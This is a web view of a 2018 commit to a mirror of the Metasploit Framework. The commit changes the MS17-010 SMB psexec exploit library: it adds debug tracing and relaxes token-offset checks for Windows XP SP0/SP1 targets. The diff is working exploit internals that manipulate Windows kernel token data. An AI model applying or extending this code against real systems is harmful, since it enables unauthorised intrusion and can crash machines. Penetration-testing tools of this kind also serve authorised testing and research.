infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

more trace and more flexible tolerance for SP0/SP1

MS-2855/keylogger-mettle-extension
zerosum0x0 2018-01-29 19:57:43 -07:00
parent 7007bc1444
commit bbeccdd024
1 changed files with 11 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
View File

@ -122,11 +122,15 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
@ctx['tokenData'] = tokenData
@ctx['tokenAddr'] = tokenAddr
if datastore['DBGTRACE']
print_status("TOKEN data = #{bin_to_hex(tokenData)}")
end
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
@ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
@ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
@ -134,9 +138,13 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
if datastore['DBGTRACE']
print_status("New TOKEN offsets (group count = #{userAndGroupCount})")
end
# hopefully its not bad anymore
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
raise MS17_010_Error, "Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD"
end
end
end